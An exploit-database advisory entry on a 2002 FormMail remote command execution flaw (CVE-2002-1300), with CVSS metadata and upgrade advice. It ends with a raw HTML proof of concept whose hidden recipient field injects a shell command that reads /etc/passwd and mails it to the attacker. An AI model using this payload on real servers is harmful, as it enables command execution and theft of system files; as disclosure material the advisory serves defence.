FormMail Remote Command Execution Vulnerability

vendor:

FormMail

by:

SecurityFocus

8.8

CVSS

HIGH

FormMail Remote Command Execution Vulnerability

CWE

Product Name: FormMail

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: CVE-2002-1300

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

FormMail Remote Command Execution Vulnerability

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user. A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, 'Matt Wright FormMail Remote Command Execution Vulnerability'. An attacker can craft a malicious HTML page with a form that submits to the remote FormMail script, and can include a command in the recipient field that will be executed on the remote system.

Mitigation:

Upgrade to the latest version of FormMail.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2080/info

FormMail is a widely-used web-based e-mail gateway, which allows form-based input to be emailed to a specified user.

A web server can use a remote site's FormMail script without authorization, using remote system resources or exploiting other vulnerabilities in the script. For example, this issue can be used to exploit BID 2079, "Matt Wright FormMail Remote Command Execution Vulnerability". 

<html><head><title>hack</title></head>
<body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host">
<input type="submit" name="submit" value="submit">
</form></body></html>